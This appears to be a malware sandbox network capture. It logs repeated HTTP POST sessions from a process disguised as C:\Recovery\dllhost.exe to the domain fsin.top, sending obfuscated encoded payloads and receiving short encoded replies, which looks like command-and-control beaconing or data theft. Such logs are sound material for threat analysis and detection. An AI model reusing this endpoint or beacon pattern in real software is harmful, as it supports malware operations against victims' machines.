                                                  Date: Thu, 01 Aug 2024 05:38:44 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OqvGl%2FSvzJhQsBP%2FhPIadNbt07TFaw%2Bb1WFDlm6Byn8sZi%2F7lfgfyD%2FkfGoX5LjQODccNLsZHMGcjXkUWUKN4Wse7XZ90s8G7qHtwyxyAFaHDaeRyOwPfoGblA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37bd0192b80da-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  108 | 192.168.2.4 | 49845 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:38:44.257770061 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:44.615314007 CEST | 1012 | OUT | (request body)
                                                  Aug 1, 2024 07:38:44.703675032 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:44.867178917 CEST | 584 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:44 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4DSO2vkxB0GN7Y6CtbTPVU8oJJKosJM5n7iHCYSLwHaypsPP3mwBnW9UMgNfxHcfQu%2BnvN55HneSrGTyGZ3zuyXAZRZUw%2FlIgmnOICBHFN06wNy23cNGr9%2FBjQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37bd518ab4252-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  109 | 192.168.2.4 | 49846 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:38:44.990318060 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  110 | 192.168.2.4 | 49847 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:38:45.114742994 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1284
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:45.459062099 CEST | 1284 | OUT | (request body)
                                                  Aug 1, 2024 07:38:45.576190948 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:45.821436882 CEST | 733 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:45 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=52EMzcf10dXjOIh%2Fdb%2FYa4LRk0cNej8VK6n3dWcXPyDbYjQTvrcDiyjLfcVFQT%2BUfV7gxbhi3OsxnJaSWxLk1GHyHasSSEuhX9OrfUudUI49GGqSb4RwBLarcw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37bda8b218cbd-EWR
                                                  alt-svc: h2=":443"; ma=60


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  111 | 192.168.2.4 | 49848 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:38:45.409106970 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:45.757154942 CEST | 1012 | OUT | (request body)
                                                  Aug 1, 2024 07:38:45.873986959 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:46.107743979 CEST | 582 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:46 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z5EyXoWNnnmFQELtD2FipRxbGzgGxRhDZNlPwTAeGBBSzzwN2PlhiOl06gOYvDl2zSPniOxOT34chhVH8c4us4UXLZv%2FoMRvOHV5H2YcfMETouM%2Ba2F77bJVig%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37bdc6f78431c-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  112 | 192.168.2.4 | 49849 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:38:46.246917009 CEST | 250 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Aug 1, 2024 07:38:46.599662066 CEST | 1012 | OUT | (request body)
                                                  Aug 1, 2024 07:38:46.691324949 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:46.842859030 CEST | 590 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:46 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F2%2FAMqjUur0jVra1xb%2BoEOlvdOZfPXLuQmv3muYC9ahQjw1NSsJAEH%2BediDuRsOt4tR0GxCoBOvTXUnIzw6h%2BHsokEIrUwNyac1YTFqyonvs3Z%2Ba1L2Bb309ag%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37be18d5f436d-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  113 | 192.168.2.4 | 49850 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:38:46.963857889 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:47.318399906 CEST | 1012 | OUT | (request body)
                                                  Aug 1, 2024 07:38:47.426919937 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:47.680135965 CEST | 580 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:47 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M4wGkB0Er24yWjyQo07hEwlik1A5yXP9s6DQQeZ1Al3BDR0Cr1%2ByV3FDW58sOkEptuoR8XD1mIptRKhEDAuI0W4rWI79UQb1K62dBsHdfScDL3YHHozHWzPLKQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37be618f90cba-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  114 | 192.168.2.4 | 49851 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:38:48.071274042 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1008
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:48.428015947 CEST | 1008 | OUT | (request body)
                                                  Aug 1, 2024 07:38:48.552845001 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:48.804177046 CEST | 586 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:48 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lgbF3cCNoEbWoJ9OUNdRZqcYVx9wKb85bXGK3AkkGXBnr%2BOvSUFeXYbrOFUwWyTADz4aIJjYn0tNH0Ehh61%2FwLHoA14SfY4nVgPk792u58GH%2Bq8%2FDb6vDdyKmw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37bed28370f6f-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  115 | 192.168.2.4 | 49852 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:38:49.190155029 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:49.537230968 CEST | 1012 | OUT | (request body)
                                                  Aug 1, 2024 07:38:49.666701078 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:49.828634977 CEST | 596 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:49 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yO74L%2By7Lkdk2HXoLp4e2JpRYXTMTpENfFRVMi7qiWvB%2FMr4%2B52l3QAkYJJ4G47ET%2FxEjbsVCRuV%2BkZqs%2Bw%2FntchSC9rHyR3DB4Zi4ZmKQkvwLqQHE%2F%2Btk6jKg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37bf41e974378-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  116 | 192.168.2.4 | 49853 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:38:49.966178894 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:50.318779945 CEST | 1012 | OUT | (request body)
                                                  Aug 1, 2024 07:38:50.425204039 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:50.671140909 CEST | 588 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:50 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PpSL2Uj7%2FIyU0YYuzwQgZHUtb%2BlEhiDY2QhgvRIDotcutVhi%2FY5g7X6dXWmj4%2FqrRuHOfYsdjUPQ2W7sa2zBxqhKTipsNuQHn10tLtO%2FXxH95Pl6smtlJtF02g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37bf8d80d42c9-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  117 | 192.168.2.4 | 49854 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:38:50.823575020 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  118 | 192.168.2.4 | 49855 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:38:50.842247963 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1284
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:51.193577051 CEST | 1284 | OUT | Data Raw: 54 53 5d 52 5f 5e 58 53 5c 5e 5a 51 54 53 57 51 57 5e 5e 5d 56 5d 51 5e 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TS]R_^XS\^ZQTSWQW^^]V]Q^[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"'""#$& ?8!*!2+4%?1 8#!^?^15&G#.X!0
                                                  Aug 1, 2024 07:38:51.285062075 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:51.482547045 CEST | 737 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:51 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Fz9WfzDRJVx%2BJQZhdfTxXdJ6PH4wgkq1qwB3Ent250MB3kSfyRBfn%2BnvZKU7KJ%2BiYdjXqt01hGY2BubQvsr2TD4Rw2a0GhWH22q9yfwgVGCgOnWu%2BPEinXIa%2FQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37bfe4f69c336-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 39 38 0d 0a 02 1f 22 50 30 06 0c 51 22 39 20 52 3e 0c 22 0a 3d 0a 23 07 2a 29 05 15 27 3c 0f 13 31 38 3f 0d 22 12 25 5b 26 2c 32 51 31 1c 3e 5e 2a 37 21 51 04 11 25 02 20 20 26 14 2a 29 2c 00 25 38 2b 13 20 18 28 11 30 0d 26 08 20 39 2b 05 3f 32 29 1e 2b 31 2b 53 2e 15 24 01 3f 0d 24 58 32 26 2a 56 0d 17 22 1d 2d 5e 24 1c 30 0c 3b 08 23 05 38 0a 23 28 2e 04 29 06 2e 5d 2a 1d 2e 5b 2d 55 28 01 3d 23 3a 51 3f 03 25 13 3f 04 03 16 27 39 22 5d 2c 03 2d 48 0e 3d 59 4d 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 98"P0Q"9 R>"=#*)'<18?"%[&,2Q1>^*7!Q% &*),%8+ (0& 9+?2)+1+S.$?$X2&*V"-^$0;#8#(.).]*.[-U(=#:Q?%?'9"],-H=YM0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  119 | 192.168.2.4 | 49856 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:38:50.964005947 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:51.318464041 CEST | 1012 | OUT | Data Raw: 51 53 58 5c 5a 5a 5d 53 5c 5e 5a 51 54 54 57 50 57 51 5e 5a 56 5d 51 55 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: QSX\ZZ]S\^ZQTTWPWQ^ZV]QU[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"Y3T66-;0^+;%?691Q2&(W;=#!(/%%&G#.X!,
                                                  Aug 1, 2024 07:38:51.408632994 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:51.662854910 CEST | 586 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:51 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N3f3IvHjPLvJkCqeGRs9TTsR4VgHfRV%2FVSN6GL8vdx8hymCsG5xoYBPj9D4D%2FdbbKED%2BbjNN5Xwdx5VCQUTv8PZ6psYEgHRXvYLggEbHwoXjsl9tYq%2F38vAB4g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37bff0dfa1889-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  120 | 192.168.2.4 | 49857 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:38:51.794023037 CEST | 250 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Aug 1, 2024 07:38:52.146538973 CEST | 1012 | OUT | Data Raw: 54 57 5d 51 5a 5e 5d 56 5c 5e 5a 51 54 54 57 50 57 52 5e 57 56 59 51 5e 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TW]QZ^]V\^ZQTTWPWR^WVYQ^[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S!'!&".<]3?">%^(&.Y%#?/>X5;(25&G#.X!,
                                                  Aug 1, 2024 07:38:52.238814116 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:52.490225077 CEST | 582 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:52 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qLdzPJ2isZN3sd5AQJnd7YEOLIgORRK8vIEK7IfAlIENF0Q4y9LOU0%2BHkzP7Wg5z7ZJnX1kXf%2BA51nKRIN5nlxfRSO3s7AXYQ4axgBZCN2ryiZO5WGKU9axE0Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37c043a4e8c30-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  121 | 192.168.2.4 | 49858 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:38:52.635308981 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1008
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:52.990560055 CEST | 1008 | OUT | Data Raw: 54 51 58 51 5a 55 58 54 5c 5e 5a 51 54 56 57 52 57 50 5e 5e 56 5b 51 55 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TQXQZUXT\^ZQTVWRWP^^V[QU[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"Y0"(\&%?^(+U=C)2(,2/13/3X5^ 2&G#.X!
                                                  Aug 1, 2024 07:38:53.077451944 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:53.289967060 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:53.327148914 CEST | 584 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:53 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KJPfRHdWvcU%2B0pptyc3mgTeCYRrmjeTGvFC86hzj90LJvBQgGZ9QiXnCAiiAvuWWcqu4rHCd88n8JtunvzAeJySp78ikly5LlvG%2BMZiEzu%2FmNI9l24ctIIJTcA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37c097c460f79-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  122 | 192.168.2.4 | 49859 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:38:53.462008953 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
